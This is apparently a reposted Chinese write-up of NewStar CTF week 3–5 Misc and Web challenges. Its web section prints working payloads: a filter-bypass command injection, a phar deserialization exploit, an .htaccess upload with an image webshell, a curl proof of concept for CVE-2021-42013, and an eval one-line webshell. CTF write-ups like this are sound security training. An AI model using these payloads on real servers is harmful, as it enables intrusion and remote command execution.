NewStar CTF Week3Misc 4-5Web

news2024/11/25 9:37:36

目录

<1> Week-3 Misc

(1) Whats HTTP

(2) qsdz's girlfriend 3

(3) WebShell!

(4) 混沌的图像

<1> Week-4 Web

(1) So Baby RCE(%0A进行rce rev|sort读取flag)

(2) UnserializeThree(%0d换行rce)

<2> week5-web

(1) Give me your photo PLZ(.htaccess配置文件漏洞)

(2) Unsafe Apache(CVE-2021-42013)

(3) So Baby RCE Again(suid-date越权读取)


<1> Week-3 Misc

(1) Whats HTTP

http的包都导出来,对比一下长度 发现了这个长度比较不一样的包 追踪http流

 得到一串base64:NjY2YzYxNjc3YjM0NjYzMzMzMzYzNDM5NjQzMDMzMzA2MzM2MzczNzM4MzQzMjM2MzkzNzMxNjIzNTM0NjQ2NDM3MzI2NTYzNjU3ZA==

解码得到:

666c61677b34663333363439643033306336373738343236393731623534646437326563657d

类似一一串hex编码 解码得到flag:flag{4f33649d030c6778426971b54dd72ece}

(2) qsdz's girlfriend 3

题目描述:

        我们入侵了qsdz的服务器,你可以在服务器中找到他真实的女朋友吗?qsdz的用户密码是Hikari(请用SSH连接)

我们用xshell连上ssh服务

 

在start.sh里看见flag在:/root/girlfriends/hasegawa_azusa

尝试cat一下:
cat: /root/girlfriends/hasegawa_azusa: Permission denied  然而没有权限

一、cp复制出来:cp -r /root/girlfriends/hasegawa_azusa /home/flag 然后cat出来

二、 查找系统有SUID权限的可执行文件

发现date  date -f读取

 

(3) WebShell!

题目描述:

        溯源攻击者窃取的文件内容!他用了蚁剑诶? Flag格式为:flag{WebShell密码_黑客获取的用户名_机密文件内容} 例如flag{cmd_root_secret}

可以一个一个找,也可以通过 过滤http contains "eval"看看有没有木马

webshell密码为:

 黑客获取的用户名:

 机密文件内容:

 所以flag为:flag{n3wst4r_www-data_Y0UAr3G00D}

 

(4) 混沌的图像

题目描述:

        听说之前考过LSB,那你还记得那道密码题吗?"

stefsolve 看到了一段png图片编码,save bin为flag.png

 010editor打开 文件末尾发现了参数k1,k2

 k1=3.5606267076894413,k2=3.9101741242346346,k=[106,80,198,220,47,18,19,230,42,202,207,196,214,132,188,190]

根据题目描述联想到WEEK1 Crypto题目中的chaos

NewStarCTF 公开赛第一周Writeup | Anyyy's Blog

替换掉k1k2k,而c就为flag.pngrgb数值列表

这里直接贴上现成的脚本:

from PIL import Image

img = Image.open('flag.png')
w,h=img.size
pic = []
for i in range(w):
    for j in range(h):
        (r, g, b) = img.getpixel((i,j))
        pic.append(r)
        pic.append(g)
        pic.append(b)

sum, r, k = 0, 1, [106,80,198,220,47,18,19,230,42,202,207,196,214,132,188,190]
k1,k2 = 3.5606267076894413, 3.9101741242346346
for i in k:
    sum += i
    r ^= i
a_1 = (sum/256) % 1
timea1 = 3 + int(1000 * a_1) % 30
b_1 = (r/256)
timeb1 = 3 + int(1000 * b_1) % 30
xc_1 = a_1 * b_1
yc_1 = (a_1 + b_1) % 1
data = (a_1, timea1, b_1, timeb1, xc_1, yc_1)
key = (k1,k2)

def LC(key, x, times, flags):
    (k1, k2) = key
    xn = []
    xn.append(x)
    if flags:
        xn.append(1 - 2 * xn[0]**2)
    else:
        xn.append(k2 * xn[0]**3 + (1 - k2)*xn[0])
    for i in range(times):
        assert xn[i]>=-1 and xn[i]<=1 and xn[i+1]>=-1 and xn[i+1]<=1
        if flags:
            xn.append((1 - 2 * xn[i]**2)*(k1 * xn[i+1]**3 + (1 - k1)*xn[i+1]))
        else:
            xn.append((k2 * xn[i]**3 + (1 - k2)*xn[i])*(1 - 2 * xn[i+1]**2))
    return xn[times + 1]

m, c = [], pic
miu, omiga = [], []
ta = timea1
tb = timeb1
all_list = []
for flag in c:
    miu.append(LC(key, a_1, ta, 1))
    omiga.append(LC(key, b_1, tb, 0))
    all_list.append(((int(miu[-1] * 1000) + int(omiga[-1] * 1000))%256)^flag)
    delta = flag/256
    for i in range(3):
        y = (yc_1 + delta) % 1
        y = k1 * y**3 + (1 - k1) * y
        x = xc_1
        x = k2 * x**3 + (1 - k2) * x
    ta = 3 + int(1000 * x) % 30
    tb = 3 + int(1000 * y) % 30

rgb_list = []
for i in range(0, len(all_list), 3):
    rgb_list.append(all_list[i:i+3])

width, height = 1300, 867 # flag.png的宽高
new_img = Image.new('RGB', (width, height))
idx = 0
for w1 in range(width):
    for h1 in range(height):
        new_img.putpixel((w1, h1), tuple(rgb_list[idx]))
        idx += 1
new_img.save('res-flag.png')
new_img.show()

运行之后得到新的图片,lsb发现flag

<1> Week-4 Web

(1) So Baby RCE(%0A进行rce rev|sort读取flag)

<?php
if(isset($_GET["cmd"])){
    if(preg_match('/et|echo|cat|tac|base|sh|more|less|tail|vi|head|nl|env|fl|\||;|\^|\'|\]|"|<|>|`|\/| |\\\\|\*/i',$_GET["cmd"])){
       echo "Don't Hack Me";
    }else{
        system($_GET["cmd"]);
    }

源码里preg_match过滤了好多命令,只能靠%0A多命令切换目录不断切换到/目录,发现flag

fl被过滤用?替代,读取flag用 rev或者sort

?cmd=%0Acd${IFS}..%0Acd${IFS}..%0Acd${IFS}..%0Asort${IFS}ffff?lllaaaaggggg

(2) UnserializeThree(%0d换行rce)

 查看源码发现 class.php

访问之后得到源码:

 <?php
highlight_file(__FILE__);
class Evil{
    public $cmd;
    public function __destruct()
    {
        if(!preg_match("/>|<|\?|php|".urldecode("%0a")."/i",$this->cmd)){
            //Same point ,can you bypass me again?
            eval("#".$this->cmd); 
        }else{
            echo "No!";
        }
    }
}

file_exists($_GET['file']); 

file_exists()函数可触发 phar反序列化

cmd过滤了 < > ? php和%0a 因此不可以用?><?php 来闭合前面的#号了,但我们还可以利用%0d

构造phar文件 

<?php
class Evil{
    public $cmd;
}
$test = new Evil();
$test->cmd= urldecode("%0d").'system("ls");';
echo serialize($test);
/* 文件名 */
$phar = new Phar("a.phar"); //文件名
$phar->startBuffering();
/* 设置stub,必须要以__HALT_COMPILER(); ?>结尾 */
$phar->setStub("<?php __HALT_COMPILER(); ?>");
/* 设置自定义的metadata,序列化存储,解析时会被反序列化 */
$phar->setMetaData($test);
$phar->stopBuffering();
?>

 但是.phar后缀被限制了,hacker!

我们改后缀为.png ?file=phar://路径 执行ls命令,发现flag文件

 再生成一个cat命令的phar文件重复上述操作即可得到flag

<2> week5-web

(1) Give me your photo PLZ(.htaccess配置文件漏洞)

.htaccess解析漏洞,上传.htaccess 内容为:AddType application/x-httpd-php .jpg

再次上传 123.jpg图片木马  执行 cat /flag命令后看见  那么flag就在phpinfo里

(2) Unsafe Apache(CVE-2021-42013)

Apache/2.4.50  存在命令执行漏洞漏洞 CVE-2021-42013

poc:curl -v --data "echo;id" 'http://ip:port/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

 cat 即可

(3) So Baby RCE Again(suid-date越权读取)

?cmd=ls / | tee 1.txt

tee 命令外带命令执行结果

?cmd=cat /ffll444aaggg | tee 1.txt

未果。。。700文件

SUID提权:find / -perm -u=s -type f 2>/dev/null > ./1.txt

find / -user root -perm -4000 -print 2>/dev/null

 看见date,从其他师傅处得知: date -f可以越权读取

?cmd=echo '<?php eval($_POST[a]); ?>' > a.php 写入一句话木马 蚁剑连接

date -f ffl*得到flag

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/65210.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

step-by-step 配置 gtest 在 vscode 测试 c/c++(Ubuntu 环境下示范)

1. 去把 gtest 装好 详见&#xff1a;CSND-PangCoder-[Ubuntu]GTest安装和测试-https://blog.csdn.net/qq_36251561/article/details/85319547 2. 在 VS Code 打上这几个插件 印象里打上 C TestMate 下面的就会自动装了…如果没有就手动装一下 3. 编写测试脚本 第一步那…

【Pytorch】第 1 章 :强化学习和 PyTorch 入门

&#x1f50e;大家好&#xff0c;我是Sonhhxg_柒&#xff0c;希望你看完之后&#xff0c;能对你有所帮助&#xff0c;不足请指正&#xff01;共同学习交流&#x1f50e; &#x1f4dd;个人主页&#xff0d;Sonhhxg_柒的博客_CSDN博客 &#x1f4c3; &#x1f381;欢迎各位→点赞…

Java并发常见面试题(三)

并发编程三大特性 原子性 一次操作或者多次操作&#xff0c;要么所有的操作都得到执行并且不受任何因素的干扰而中断&#xff0c;要么都不会执行。 在 Java 中&#xff0c;可以借助synchronized 、各种 Lock 以及各种原子类实现原子性。synchronized 和各种 Lock 可以保证任…

【吴恩达机器学习笔记】十三、异常检测

✍个人博客&#xff1a;https://blog.csdn.net/Newin2020?spm1011.2415.3001.5343 &#x1f4e3;专栏定位&#xff1a;为学习吴恩达机器学习视频的同学提供的随堂笔记。 &#x1f4da;专栏简介&#xff1a;在这个专栏&#xff0c;我将整理吴恩达机器学习视频的所有内容的笔记&…

[附源码]计算机毕业设计人事系统Springboot程序

项目运行 环境配置&#xff1a; Jdk1.8 Tomcat7.0 Mysql HBuilderX&#xff08;Webstorm也行&#xff09; Eclispe&#xff08;IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持&#xff09;。 项目技术&#xff1a; SSM mybatis Maven Vue 等等组成&#xff0c;B/S模式 M…

Contest2850 - 【在线编程平台】2022年计算机类数据结构作业12.20221201-1206

问题 A: 二叉排序树 - 文本输出 题目描述 给定一个序列&#xff0c;使用该序列生成二叉排序树&#xff08;也叫二叉搜索树&#xff0c;BST&#xff09;&#xff0c;然后以本题规定方法输出该二叉排序树。 例&#xff1a; 给定一个序列&#xff1a;43 25 29 67 17 88 54 47 35…

用R语言制作交互式图表和地图

可以直接从R / RStudio制作在线交互式图表和地图。 去年&#xff0c;我们为一位客户进行了短暂的咨询工作&#xff0c;他正在构建一个主要基于在线交互式图表的分析应用程序。 配置 启动RStudio&#xff0c;创建一个新的RScript&#xff0c;然后将工作目录设置为下载的数据文…

git merge origin master和git merge master的区别(个人理解)

先说结论 git merge origin master 意思是当前的分支,进行合并,合并二个分支分别是远程分支master在本地的副本和本地分支的master git merge master 当前分支于本地所处的master分支进行合并 还有就是 git merge origin master是把origin merge 到 master 上的说法是错误的…

小侃设计模式(十五)-命令模式

1.概述 命令模式&#xff08;Command Pattern&#xff09;是将一个请求封装为一个对象&#xff0c;从而让你使用不同的请求把客户端参数化&#xff0c;对请求排队或者记录请求日志&#xff0c;可以提供命令的撤销和恢复功能。它是行为型模式的一种&#xff0c;能够有效降低系统…

【华为上机真题 2022】流水线

&#x1f388; 作者&#xff1a;Linux猿 &#x1f388; 简介&#xff1a;CSDN博客专家&#x1f3c6;&#xff0c;华为云享专家&#x1f3c6;&#xff0c;Linux、C/C、云计算、物联网、面试、刷题、算法尽管咨询我&#xff0c;关注我&#xff0c;有问题私聊&#xff01; &…

ES6:ES6 的内置对象扩展

Array 的扩展方法 扩展运算符&#xff08;展开语法&#xff09; 扩展运算符可以将数组或者对象转为用逗号分隔的参数序列。 let ary [1, 2, 3];...ary // 1, 2, 3console.log(...ary); // 1 2 3console.log(1, 2, 3)为什么没有逗号&#xff0c;这个是因为被当做console…

毕业设计-机器视觉的疲劳驾驶检测系统-python-opencv

目录 前言 课题背景和意义 实现技术思路 实现效果图样例 前言 &#x1f4c5;大四是整个大学期间最忙碌的时光,一边要忙着备考或实习为毕业后面临的就业升学做准备,一边要为毕业设计耗费大量精力。近几年各个学校要求的毕设项目越来越难,有不少课题是研究生级别难度的,对本科…

买家的诉求决定你的产品卖点

产品卖点的核心是消费者的诉求&#xff0c;也就是消费者为什么对某个产品有需求。 为什么要用广角镜头&#xff1f;可能要拍比较大、比较宏伟的环境。 为什么要用微距&#xff1f;可能要去拍一些细节场景。 …… 很多时候跟客户对不上&#xff0c;是因为不知道客户具体要做…

挨个排列原子!美国科学家打造出全新量子试验台

11月29日&#xff0c;美国科学家建立了一个原子级精度的测试平台&#xff0c;能以全新的方式操纵电子&#xff0c;在量子计算中有着巨大潜力。电子是微观粒子&#xff0c;可以在材料和设备之间携带电量和信息。它们通常可视为离散的小球&#xff0c;在电路中或原子周围移动。虽…

Git下载安装及环境配置,解决安装包下载慢问题(详细版)

Git是我们平时开发都要用到的项目管理工具&#xff0c;虽然有网页版的Git网站&#xff0c;但是在本地安装Git后&#xff0c;可以直接使用命令语句来进行项目的上传与克隆。还是非常方便的。 今天就来介绍下Git的下载。 git下载安装一、下载二、安装git三种操作界面的简介三、设…

不同应用选择荧光染料 -CY7 ALK脂溶性Sulfo-Cyanine7 alkyne 结构式应用

不同应用选择荧光染料-多肽、蛋白、抗体标记、活体成像 荧光标记技术是指运用荧光染料与待研究对象结合&#xff0c;利用它的荧光特性&#xff0c;提供待研究对象相关信息。荧光标记具有操作简便、高稳定性、高灵敏度等优势&#xff0c;使荧光染料在生命科学研究中应用&#xf…

软件测试之对于测试的反思及思考

1.针对一个页面&#xff0c;从页面的完整性(包括字段、输入框、功能点)出发 2.对于分页&#xff0c;考虑未在首页的时候的测试&#xff0c;末页的情况。 3.对条件的查询来说&#xff0c;要针对于单个输入框的测试、交叉输入框的测试 4.对于删除、修改等&#xff0c;要考虑你…

智慧采购管理系统电子招投标优势浅析,助力建筑工程企业高效做好采购管理工作

随着建筑工程行业的蓬勃发展&#xff0c;竞争也日益激烈。在项目执行过程中&#xff0c;从项目前期投标开始&#xff0c;到项目立项、施工过程、竣工结束的整个过程中&#xff0c;采购活动频繁&#xff0c;且采购类型较多&#xff0c;各项采购金额巨大&#xff0c;如何应用电子…

RK3568平台开发系列讲解(音视频篇)如何把音视频流进行网络传输?

🚀返回专栏总目录 文章目录 一、什么是RTP二、RTP 协议详解三、RTCP 协议详解沉淀、分享、成长,让自己和他人都能有所收获!😄 📢如何将码流打包成一个个数据包发送到网络上,那么我们就需要来了解一下 RTP 和 RTCP 协议。 一、什么是RTP 为了保证传输的实时性,一般使…

[附源码]Python计算机毕业设计Django图书馆出版物预订系统

项目运行 环境配置&#xff1a; Pychram社区版 python3.7.7 Mysql5.7 HBuilderXlist pipNavicat11Djangonodejs。 项目技术&#xff1a; django python Vue 等等组成&#xff0c;B/S模式 pychram管理等等。 环境需要 1.运行环境&#xff1a;最好是python3.7.7&#xff0c;…